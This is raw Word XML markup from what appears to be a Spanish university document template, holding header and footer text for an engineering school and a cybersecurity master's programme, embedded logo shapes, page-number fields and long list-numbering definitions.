    <w:pPr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:pict w14:anchorId="2F492EF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 style="position:absolute;left:0;text-align:left;margin-left:370.05pt;margin-top:30.45pt;width:81pt;height:97.2pt;z-index:-1;visibility:visible;mso-wrap-style:square;mso-wrap-edited:f;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9.05pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9.05pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:0" o:allowincell="f" strokeweight="0">
          <v:imagedata r:id="rId1" o:title=""/>
          <w10:wrap anchory="page"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:pict w14:anchorId="7602B2C7">
        <v:shape id="Picture 5" o:spid="_x0000_s1026" type="#_x0000_t75" alt="A logo of a university&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:-58.65pt;margin-top:-105pt;width:53.2pt;height:92.65pt;z-index:1;visibility:visible;mso-wrap-style:square;mso-wrap-edited:f;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
          <v:imagedata r:id="rId2" o:title="A logo of a university&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          <w10:wrap type="square" anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="3D9E5D53" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
      </w:rPr>
      <w:br/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7F6F1A08" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="64469FC9" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="000C1FC5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="255209FB">
        <v:rect id="Rectangle 237" o:spid="_x0000_s1025" style="position:absolute;margin-left:-8.95pt;margin-top:66.45pt;width:431.95pt;height:177.35pt;z-index:-2;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9.05pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9.05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" o:allowincell="f" filled="f" stroked="f" strokeweight="0">
          <v:textbox inset="2.56mm,1.29mm,2.56mm,1.29mm">
            <w:txbxContent>
              <w:p w14:paraId="744B1237" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
                <w:pPr>
                  <w:pStyle w:val="Contenidodelmarco"/>
                  <w:jc w:val="center"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="7F06CFF9" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
                <w:pPr>
                  <w:pStyle w:val="Contenidodelmarco"/>
                  <w:jc w:val="center"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="4365775F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00BE337D">
                <w:pPr>
                  <w:pStyle w:val="Contenidodelmarco"/>
                  <w:jc w:val="center"/>
                  <w:rPr>
                    <w:b/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                  <w:t>Escuela de Ingenierías</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="26A1515A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
                <w:pPr>
                  <w:pStyle w:val="Contenidodelmarco"/>
                  <w:jc w:val="center"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="15BABB5F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
                <w:pPr>
                  <w:pStyle w:val="Contenidodelmarco"/>
                  <w:jc w:val="center"/>
                  <w:rPr>
                    <w:b/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                  <w:t>Industrial, Informática y Aeroespacial</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
        </v:rect>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A9D03" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">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8E7E3" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">Grado en Ingeniería Informática                                                                 Página </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>0</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>100</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>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0866D3" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">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605C37" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:i/>
        <w:iC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4CC0AC" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="48EDD9DA">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F7610E" w14:textId="77777777" w:rsidR="00F4404F" w:rsidRDefault="00F4404F"/>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2C46B" w14:textId="50C29D8F" w:rsidR="00F4404F" w:rsidRPr="007220DC" w:rsidRDefault="007220DC" w:rsidP="007220DC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="48EDD9DA">
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">Máster en Investigación en Ciberseguridad                                                                    </w:t>
    </w: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907"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB3856D2"/>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9394034"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51E2BFB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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0D707C59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="159A363C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1060" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1420" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1420" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1780" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2140" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2500" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2500" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2860" w:hanging="2160"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3220" w:hanging="2520"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="103A4043"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B29A70D0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="348" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="1068" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="1788" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="2508" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="3228" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="3948" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="4668" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="5388" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-712"/>
        </w:tabs>
        <w:ind w:left="6108" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="15471648"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4FCC4B8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1068"/>
        </w:tabs>
        <w:ind w:left="1068"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decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1060" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2168" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2888" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3608" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="4328" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5048" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5768" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1FEC7DA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFE27D62"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1060" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1780" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2500" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3220" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3940" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="4660" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5380" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6100" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6820" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24544CD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB6E1D6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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B9FA5D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="774894E6"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E7A3058"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF326E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F5C821D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23606200"/>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283"/>
        </w:tabs>
        <w:ind w:left="859" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading3"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading4"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading5"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1008" w:hanging="1008"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading6"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1152" w:hanging="1152"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading7"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1296" w:hanging="1296"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading8"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading9"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
